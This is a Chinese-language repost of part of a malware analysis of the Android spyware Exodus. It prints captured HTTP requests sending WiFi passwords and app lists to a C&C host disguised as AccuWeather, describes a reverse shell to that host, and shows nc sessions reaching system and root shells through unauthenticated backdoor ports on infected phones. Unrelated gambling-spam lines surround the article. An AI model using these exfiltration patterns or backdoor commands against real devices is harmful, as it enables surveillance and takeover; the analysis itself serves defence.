奥运会网球比分规则|雪缘网网球比分直播|
歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

新型Android間諜軟件Exodus(下)

來源:本站整理 作者:佚名 時間:2019-04-04 TAG: 我要投稿

如前所述,我們的測試設備從第一階段到第二階段都是自動被收集數據的。例如,手機使用的WiFi網絡的密碼使用文件名格式DD_MM_2019_HH_mm_ss_XXXXXXXXXXXXX.txt.crypt(IMEI后面的日期時間)存儲在文件夾/storage/emulated/0/.lost+found/0BBDA068-9D27-4B55-B226-299FCF2B4242/中。最后,我們觀察到代理將我們的測試手機中的WiFi密碼泄露給了C&C服務器:
PUT /7d2a863e-5899-4069-9e8e-fd272896d4c7/A35081BD-4016-4C35-AA93-38E09AF77DBA.php HTTP/1.1
User-Agent: it.promofferte:[REDACTED]
DETAILS: {"date":"[REDACTED]","imei":"[REDACTED]","filenameb64":"[REDACTED]\u003d\u003d","filepathb64":"[REDACTED]\u003d","fileDirectoryb64":"[REDACTED]\u003d","uploadType":"WIFIPASSWORD","encrypted":true}
Content-Type: application/octet-stream
Content-Length: 277
Host: ws.my-local-weather.com
Connection: Keep-Alive
Accept-Encoding: gzip
 
l.9TqRuosV..~.:. ...` [REDACTED] ....s)Sp.^...5z..d0pRu
 
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Jan 2019 15:53:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
 
OK
同樣,代理會向C&C服務器發送已安裝的應用程序列表:
PUT /7d2a863e-5899-4069-9e8e-fd272896d4c7/A35081BD-4016-4C35-AA93-38E09AF77DBA.php HTTP/1.1
User-Agent: it.promofferte:[REDACTED]
DETAILS: {"date":"[REDACTED]","imei":"[REDACTED]","filenameb64":"[REDACTED]\u003d\u003d","filepathb64":"[REDACTED]\u003d\u003d","fileDirectoryb64":"[REDACTED]\u003d","uploadType":"APPLIST","encrypted":true}
Content-Type: application/octet-stream
Content-Length: 11502
Host: ws.my-local-weather.com
Connection: Keep-Alive
Accept-Encoding: gzip
 
(..5."...0...gVE^[email protected]^&Q....9.ua8.+WCQ%]T^Q.
.UYY.R][V.0.5.6...1]0P&.pYM.0AFZ[W~Q[S.
 
[REDACTED]
 
該C&C服務器從2017年4月起就一直處于活躍狀態,并且是模擬合法服務AccuWeather進行注冊的。
Registrant Name: AccuWeather, Inc.
Registrant Organization: AccuWeather, Inc.
Registrant Street: 385 SCIENCE PARK RD
Registrant City: STATE COLLEGE
Registrant State/Province: PA
Registrant Postal Code: 16803-2215
Registrant Country: US
Registrant Phone: +1.8142358528
Registrant Phone Ext:
Registrant Fax: +1.8142358528
Registrant Fax Ext:
Registrant Email: [email protected][.]com
本地和遠程shell
為了在受感染的設備上執行命令,以及為C&C服務器的運營人員提供一個反向shell, Exodus Two會嘗試執行它下載的名為null的payload。一旦啟動,null將首先通過檢查本地端口號6842是否可用,來驗證它是否能夠在系統中復制,以及當前是否有自身的其他實例在運行。
然后,此payload將嘗試在端口22011上將遠程reverse / system / bin / sh shell實例化到C&C服務器ws.my-local-weather [.] com中。值得注意的是,這個遠程反向shell不使用任何傳輸密碼,因此可能會受到中間人的攻擊:

同時,null也將綁定0.0.0.0:6842上的本地shell。Exodus Two將使用此本地端口在Android設備上執行各種命令,例如啟用或禁用某些服務,或解析應用程序數據庫。然而,將shell綁定到所有可用的接口上,顯然會使任何與受感染設備共享本地網絡的人都可以訪問它。例如,如果受感染的設備連接到公共Wi-Fi網絡,任何其他主機都可以通過連接端口獲得設備上的終端,而無需任何形式的身份驗證。
[email protected]:~$ nc 192.168.1.99 6842 -v
Connection to 192.168.1.99 6842 port [tcp/*] succeeded!
[email protected]:/ $ id
id
uid=10114(u0_a114) gid=10114(u0_a114) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),50114(all_a114) context=u:r:untrusted_app:s0
如果移動運營商沒有對客戶端實施適當的隔離,那么受感染的設備也有可能暴露在蜂窩網絡的其他部分。
顯然,這不僅讓設備面臨著數據泄露問題,還面臨數據被篡改的風險。
null并不是打開手機shell的唯一payload。實際上,rootdaemon二進制文件提供了執行命令的其他幾種可能性,只需連接到TCP端口6200:
1. 將命令sh發送到TCP端口6200會完整復制一個終端:
[email protected]:~$ nc 192.168.1.99 6200
sh
[email protected]:/ $ id
id
uid=1000(system) gid=1000(system) groups=1015(sdcard_rw),1028(sdcard_r),2000(shell),3003(inet) context=u:r:system:s0
[email protected]:/ $
2. 發送cmd命令,一個正確的終端命令將會對它執行,并打印輸出(在本例中,我們使用id,它顯示運行發出命令的系統用戶的身份):
[email protected]:~$ nc 192.168.1.99 6200
cmd id
uid=1000(system) gid=1000(system) groups=1015(sdcard_rw),1028(sdcard_r),2000(shell),3003(inet) context=u:r:system:s0
3. 執行與上面相同的操作,但是使用命令sucmd將以root身份運行終端命令:
$ nc 192.168.1.99 6200
sucmd id
uid=0(root) gid=0(root) groups=1015(sdcard_rw),1028(sdcard_r),2000(shell),3003(inet) context=u:r:system:s0
TCP端口6200上的rootdaemon支持的其他命令有su(在我們的測試中沒有正確工作)、loadsocketpolicy、loadfilepolicy、remount和removeroot。

[1] [2] [3] [4]  下一頁

【聲明】:黑吧安全網(http://www.nddver.tw)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        奥运会网球比分规则
        分分彩口诀 福建36选7开奖彩票 皇冠90vs即时足球指数 吉鑫娱乐首页 广西快乐双彩规则 足彩进球彩开奖 淘宝快3开奖结果 北京赛车pk10现在直播 雷速体育比分直播下载 朝鲜你想赚钱吗怎么写